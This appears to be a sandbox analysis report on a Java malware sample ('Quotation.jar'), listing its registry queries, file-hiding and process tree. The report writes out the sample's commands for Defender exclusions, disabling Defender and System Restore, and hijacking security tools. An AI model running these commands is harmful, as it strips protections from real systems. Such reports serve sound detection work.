Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2040	attrib.exe
1004	attrib.exe
868	attrib.exe
612	attrib.exe
960	attrib.exe
1208	attrib.exe
1344	attrib.exe
1356	attrib.exe

Drops desktop.ini 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\xIGQs\Desktop.ini	java.exe
File created	C:\Users\Admin\xIGQs\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\xIGQs\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\xIGQs\Desktop.ini	attrib.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe

C:\Windows\system32\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\Quotation.jar
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Adds Run entry to start application
- Drops file in System32 directory
- Drops desktop.ini
PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1944
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:2040
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1004
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\xIGQs\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini
  PID:868
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\xIGQs\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini
  PID:612
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\xIGQs
  2⤵
  - Views/modifies file attributes
  PID:960
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\xIGQs
  2⤵
  - Views/modifies file attributes
  PID:1208
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\xIGQs
  2⤵
  - Views/modifies file attributes
  PID:1344
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\xIGQs\WXPuH.class
  2⤵
  - Views/modifies file attributes
  PID:1356
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\xIGQs','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\xIGQs\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1556
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1984
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1592
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1616
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:932
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:324
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1608
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:964
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1628
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1812
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1420
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1440
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2012
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1788
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2044
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1244
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:292
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1600
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1580
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1616
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:936
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:344
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1216
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1716
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1452
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:2036
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:300
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1360
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1244
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1384
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1320
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1788
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:324
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1668
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1596
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1632
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1164
- - C:\Windows\system32\reg.exe
